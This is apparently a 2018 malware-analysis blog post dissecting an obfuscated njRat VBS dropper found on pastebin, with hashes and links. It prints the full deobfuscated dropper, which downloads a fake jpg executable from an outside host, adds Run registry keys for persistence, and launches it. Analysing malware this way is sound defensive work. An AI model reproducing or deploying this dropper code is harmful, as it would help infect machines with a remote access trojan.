Yesterday (21.11.2018) njRat a.k.a Worm.VBS.Dinihou.au dropper code was set to
pastebin.com. It was still available today in https://pastebin.com/W1yyfPiy. The
dropper downloads and persists excutable which is known as Generic.MSIL.Bladabindi.1E8DC4B3
VBS code downloads an
executable with SHA256 hash c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256
and it can be found on VirusTotal https://www.virustotal.com/#/file/c26f8c36052c150625a0e2e2676af5fa7e7d222bb2343720a66d48c7a9855256/detection
VBS code itself can be found as https://www.virustotal.com/#/file/6a4523e7eb200e1a3b22805d525b1eb0409388df118f524d7c4e64fc7a514274/detection
Script code contains very long obfuscated lines. Firstly
I dissected long lines shorter and prefixed then. So I got the following code:
str = Chr(27 + 84) & Chr(16 + 94) & Chr(-12 + 44) & Chr(18 + 83) & Chr(60 + 54) & Chr(51 + 63) & Chr(205 - 94)
str = str & Chr(43 + 71) & Chr(60 - 28) & Chr(41 + 73) & Chr(60 + 41) & Chr(7475 / 65) & Chr(135 - 18) & Chr(118 - 9)
.
.
.
str = str & Chr(64 + 18) & Chr(19 + 93) & Chr(147 - 33) & Chr(37 * 3) & Chr(140 - 41) & Chr(171 - 70) & Chr(62 + 53)
str = str & Chr(80 + 35) & Chr(40 - 27) & Chr(780 / 78)
? str
Deobfuscated code is a VB script code too:
on error resume next
WScript.Sleep 60
Dim ofso
Set ofso = CreateObject("Scripting.FileSystemObject")
CreerRep("C:\ProgramData\Adobe\system32\")
Sub CreerRep(Chemin)
If Not ofso.FolderExists(chemin) Then
CreerRep(ofso.GetParentFolderName(chemin))
ofso.CreateFolder(chemin)
End If
End Sub
dim SSSSS
dim process
dim PPPPP
set SSSSS = CreateObject("Microsoft.XMLHTTP")
set process = CreateObject("WScript.shell")
Set PPPPP = createobject("Adodb.Stream")
URL = "https://c.top4top.net/p_1055q1ssb1.jpg"
Rprocess = "C:\ProgramData\Adobe\system32\process.exe"
SSSSS.open "GET", URL, False
SSSSS.send
with PPPPP
.type = 1 '//binary
.open
.write SSSSS.responseBody
.savetofile "C:\ProgramData\Adobe\system32\process.exe", 2
end with
Set ObjetRegedit = CreateObject("WScript.Shell")
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CPU64"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\CPU64.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\process"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\process.exe", "REG_SZ"
CleRegistre = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dekstop"
ObjetRegedit.RegWrite CleRegistre, "C:\ProgramData\Adobe\system32\dekstop.ini.vbs", "REG_SZ"
Set ObjetRegedit = Nothing
WScript.Sleep 6000
process.run Rprocess
First the code creates C:\ProgramData\Adobe\system32\
folder for the final executable. Next an
XMLHTTP object is created. Object downloads a jpeg-image from https://c.top4top.net/p_1055q1ssb1.jpg
which is at this moment still available. The file is of course not an image but
njRat executable. The file saved as C:\ProgramData\Adobe\system32\process.exe.
For persisting the executable, the script uses Windows
Registry. The script code creates three new keys under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,
namely: CPU64, process and dekstop (yes it has a typo). Registry key values
are: C:\ProgramData\Adobe\system32\CPU64.exe, C:\ProgramData\Adobe\system32\process.exe
and C:\ProgramData\Adobe\system32\dekstop.ini.vbs respectively. So it seems that the first and third
registry keys are redundant and only HKCU \Software\Microsoft\Windows\CurrentVersion\Run\process
key does persist this malware.
Finally script code uses WScript.shell object to launch
downloaded payload.